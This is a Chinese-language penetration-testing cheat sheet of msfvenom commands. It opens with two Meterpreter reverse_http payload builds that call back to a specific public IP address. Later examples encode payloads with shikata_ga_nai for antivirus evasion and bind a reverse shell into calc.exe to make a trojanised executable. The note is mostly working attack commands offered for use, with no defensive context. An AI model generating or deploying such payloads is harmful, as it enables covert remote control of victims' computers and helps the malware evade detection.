渗透测试笔记4-msfvenom命令记录

有效命令

msfvenom -p windows/x64/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_3.exe
msfvenom -p windows/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_4.exe

用法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom [options] <var=val>
Example: /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--smallest Generate the smallest possible payload using all available encoders
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, thus performing a subtraction to prepend a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message

示例

生成不经过编码的普通payload(不编码->生成内容固定->直接被杀)

msfvenom -p -f -o

msfvenom –p windows/meterpreter/reverse_tcp –f c –o 1.c

经过编码器处理后生成payload

msfvenom -p -e -i -n -f -o

msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe

捆绑到正常文件后生成payload(暂未测试是否可加-e参数)

1
Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:\calc.exe –k –f exe –o C:\shell.exe

查看支持的payload列表

msfvenom -l payloads

查看支持的输出文件类型

msfvenom –help-formats

查看支持的编码方式:(为了达到免杀的效果)

msfvenom -l encoders

查看支持的空字段模块:(为了达到免杀的效果)

msfvenom -l nops